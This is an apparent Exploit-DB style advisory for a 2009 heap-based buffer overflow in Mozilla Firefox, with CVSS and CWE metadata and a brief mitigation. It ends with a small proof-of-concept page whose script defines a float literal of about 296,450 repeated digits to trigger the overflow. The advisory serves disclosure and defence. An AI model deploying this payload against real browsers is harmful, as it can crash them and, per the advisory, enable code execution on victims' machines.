Mozilla Firefox Heap-Based Buffer-Overflow Vulnerability

vendor:

Firefox

by:

SecurityFocus

7.5

CVSS

HIGH

Heap-Based Buffer-Overflow

119

CWE

Product Name: Firefox

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mozilla Firefox Heap-Based Buffer-Overflow Vulnerability

Mozilla Firefox is prone to a heap-based buffer-overflow vulnerability. An attacker can exploit this issue by tricking a victim into visiting a malicious webpage to execute arbitrary code and to cause denial-of-service conditions.

Mitigation:

Users should exercise caution when visiting untrusted websites and should avoid clicking on suspicious links.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36851/info

Mozilla Firefox is prone to a heap-based buffer-overflow vulnerability.

An attacker can exploit this issue by tricking a victim into visiting a malicious webpage to execute arbitrary code and to cause denial-of-service conditions.

NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities).

NOTE 2: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.

<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>